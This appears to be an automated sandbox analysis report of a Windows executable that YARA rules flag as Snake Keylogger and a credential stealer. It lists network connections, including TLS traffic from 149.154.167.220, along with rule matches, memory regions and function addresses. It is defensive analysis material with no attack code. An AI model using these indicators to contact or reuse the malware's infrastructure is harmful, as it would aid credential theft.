Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2..05.2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2..05.2024.exe.36c0f10.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2..05.2024.exe.36e1130.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2..05.2024.exe.36c0f10.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 4.2..05.2024.exe.357c318.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3746177900.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: .05.2024.exe PID: 4296, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: .05.2024.exe PID: 1424, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

.NET source code contains very large array initializations

Source: .05.2024.exe, Persistencia.cs

Large array initialization: : array initializer size 469291

Source: C:\Users\user\Desktop\.05.2024.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4_2_007DE084	4_2_007DE084
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBC190	10_2_00EBC190
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBB328	10_2_00EBB328
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBC470	10_2_00EBC470
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBC752	10_2_00EBC752
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EB6730	10_2_00EB6730
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EB9858	10_2_00EB9858
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EB4AD9	10_2_00EB4AD9
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBCA32	10_2_00EBCA32
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBBBD2	10_2_00EBBBD2
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBBEB0	10_2_00EBBEB0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EBB4F2	10_2_00EBB4F2
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EB3572	10_2_00EB3572
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C9770	10_2_064C9770
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CD710	10_2_064CD710
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CB790	10_2_064CB790
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CC420	10_2_064CC420
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CDD60	10_2_064CDD60
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CBDD8	10_2_064CBDD8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C9DB8	10_2_064C9DB8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CCA70	10_2_064CCA70
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CE3A8	10_2_064CE3A8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C3008	10_2_064C3008
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CD0C0	10_2_064CD0C0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CB140	10_2_064CB140
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6648	10_2_064C6648
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8600	10_2_064C8600
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8610	10_2_064C8610
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6638	10_2_064C6638
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8EC0	10_2_064C8EC0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6EE8	10_2_064C6EE8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6EF8	10_2_064C6EF8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C1E98	10_2_064C1E98
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C1EA8	10_2_064C1EA8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8EB0	10_2_064C8EB0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C2748	10_2_064C2748
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C2758	10_2_064C2758
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C4760	10_2_064C4760
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C9762	10_2_064C9762
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CD700	10_2_064CD700
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CB781	10_2_064CB781
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C779A	10_2_064C779A
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C77A8	10_2_064C77A8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C5460	10_2_064C5460
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C7C00	10_2_064C7C00
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CC410	10_2_064CC410
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0488	10_2_064C0488
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0498	10_2_064C0498
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0D48	10_2_064C0D48
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CDD50	10_2_064CDD50
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0D39	10_2_064C0D39
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CBDC7	10_2_064CBDC7
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C15E9	10_2_064C15E9
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C15F8	10_2_064C15F8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C1A41	10_2_064C1A41
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C1A50	10_2_064C1A50
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8A68	10_2_064C8A68
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8A61	10_2_064C8A61
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CCA61	10_2_064CCA61
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C22F1	10_2_064C22F1
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6A92	10_2_064C6A92
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C6AA0	10_2_064C6AA0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C7342	10_2_064C7342
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C7350	10_2_064C7350
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C9309	10_2_064C9309
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C2300	10_2_064C2300
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C9318	10_2_064C9318
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C7BF2	10_2_064C7BF2
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CE398	10_2_064CE398
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C2BA1	10_2_064C2BA1
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C2BB0	10_2_064C2BB0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0040	10_2_064C0040
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8070	10_2_064C8070
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C0006	10_2_064C0006
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C08E0	10_2_064C08E0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C08F0	10_2_064C08F0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C8080	10_2_064C8080
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CD0B8	10_2_064CD0B8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064CB130	10_2_064CB130
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C61C8	10_2_064C61C8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C1190	10_2_064C1190
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C11A0	10_2_064C11A0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064C61B8	10_2_064C61B8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DE6B8	10_2_064DE6B8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D0B30	10_2_064D0B30
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D1848	10_2_064D1848
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DA0D0	10_2_064DA0D0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D5488	10_2_064D5488
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D29C8	10_2_064D29C8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D99A8	10_2_064D99A8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DE250	10_2_064DE250
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DE260	10_2_064DE260
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DDE08	10_2_064DDE08
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DEF58	10_2_064DEF58
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DEF68	10_2_064DEF68
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DEB02	10_2_064DEB02
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D0B1F	10_2_064D0B1F
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DEB10	10_2_064DEB10
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DF3C0	10_2_064DF3C0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D8FF0	10_2_064D8FF0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D9788	10_2_064D9788
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DF3B1	10_2_064DF3B1
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D0040	10_2_064D0040
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DA068	10_2_064DA068
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D5478	10_2_064D5478
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DF80A	10_2_064DF80A
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D0006	10_2_064D0006
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D9000	10_2_064D9000
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DF818	10_2_064DF818
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D1838	10_2_064D1838
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD0EF	10_2_064DD0EF
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D20F9	10_2_064D20F9
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D1C99	10_2_064D1C99
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D1CA8	10_2_064D1CA8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD548	10_2_064DD548
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD558	10_2_064DD558
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D2558	10_2_064D2558
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D2568	10_2_064D2568
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D2108	10_2_064D2108
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD100	10_2_064DD100
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DDDF9	10_2_064DDDF9
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD9A1	10_2_064DD9A1
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D29B8	10_2_064D29B8
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DD9B0	10_2_064DD9B0

Source: .05.2024.exe, 00000004.00000002.1306722987.000000000357C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs .05.2024.exe
Source: .05.2024.exe, 00000004.00000002.1306722987.0000000003489000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs .05.2024.exe
Source: .05.2024.exe, 00000004.00000000.1268397727.00000000001A2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCBiq.exeD vs .05.2024.exe
Source: .05.2024.exe, 00000004.00000002.1305392169.00000000007EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs .05.2024.exe
Source: .05.2024.exe, 00000004.00000002.1306064134.0000000002471000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs .05.2024.exe
Source: .05.2024.exe, 00000004.00000002.1314295809.0000000006F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs .05.2024.exe
Source: .05.2024.exe, 0000000A.00000002.3746177900.0000000000422000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs .05.2024.exe
Source: .05.2024.exe, 0000000A.00000002.3746714137.00000000008F7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs .05.2024.exe
Source: .05.2024.exe	Binary or memory string: OriginalFilenameCBiq.exeD vs .05.2024.exe

Source: .05.2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 4.2..05.2024.exe.36e1130.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
